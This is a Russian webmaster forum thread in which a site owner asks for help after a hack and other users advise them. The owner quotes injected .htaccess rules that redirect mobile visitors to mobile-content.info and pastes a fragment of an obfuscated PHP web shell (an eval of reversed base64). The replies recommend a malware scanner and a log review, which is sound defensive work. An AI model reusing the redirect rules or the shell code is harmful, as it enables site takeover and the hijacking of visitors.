- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году 36,9% всех DDoS-атак пришлось на сферу финансов
А 24,9% – на сегмент электронной коммерции
Оксана Мамчуева
Тренды маркетинга в 2024 году: мобильные продажи, углубленная аналитика и ИИ
Экспертная оценка Адмитад
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
какой-то вирус меняет права на папки 777. После чего сайты на инфобоксе перестают работать.
вот, что нашел в .htaccess
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android" [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://mobile-content.info/direct.php [L,R=302]
в папках сапе появились фаилы примерно с такими названиями scripts.php, percent.php и.т.д.
Там примерно такой код
$auth_pass = "cd96fe43ae3dedd1bf4b80af703b1c1f";
eval("\145\166\141\154\050\142\141\163\145\066\064\137\144\145\143\157\144\145\050\163\164\162\162\145\166\050'=sDdphXZgsTKddSYnsFVT9EUfRCIuAyJu9Wa0NWYngyYuVnZfJXZzV3XsxWYjBSKgkSXnE2JbR1UPB1XkAiLgcibvlGdjF2JoMHdzlGel9lbvlGdj5WdmBiJmASKddSYnsFVT9EUfRCK5RHctVWIggiZpByOn8mZul0YlN1Jg0DIddSYnmZAByOpkCdkgSZk92YlR2X0YTZzFmYAxWVyMmd4JTWKt2ZD50cqlUd4ZEVNZVRTRlUDlEbShFZqZ1RlxmQDRWdGJTIvh2YlBSfg0HI7ciP2lGZvwzJukSKoI3byJXZ+0iYkRCKzJXYoNGbhl2YlB3cs1Gdo5yJg4
если удалить эти файлы, то сайт перестает работать
Может кто сталкивался, что это и как это убить?
Шелл вам залили видимо.
http://www.revisium.com/ai/ проверяйте. И ищите пути заливки по логам, если они сохранились. Возможно пароли утекли, или CMS не обновляли (дырявая она), или кому-то доступ давали.
Плюс надо искать - где еще есть обращения к этим файлам, если говорите, что при удалении сайт перестает работать. Код сапы лучше скачать снова.
Garin33, AI-Bolit почему-то не работает на инфобоксе.
Это, как ни крути, проблема инфобокса. Как вариант - временно перенести на другой хостинг, и сделать поиск на нем.
Garin33, AI-Bolit почему-то не работает на инфобоксе.
FAQ читайте к айболиту.. Там описано почему может не работать.
вроде нашел все зараженные фаилы и удалил вредоносный код. Подскажите, возможно есть способ какого-то оповещения о подобной хакерской атаке?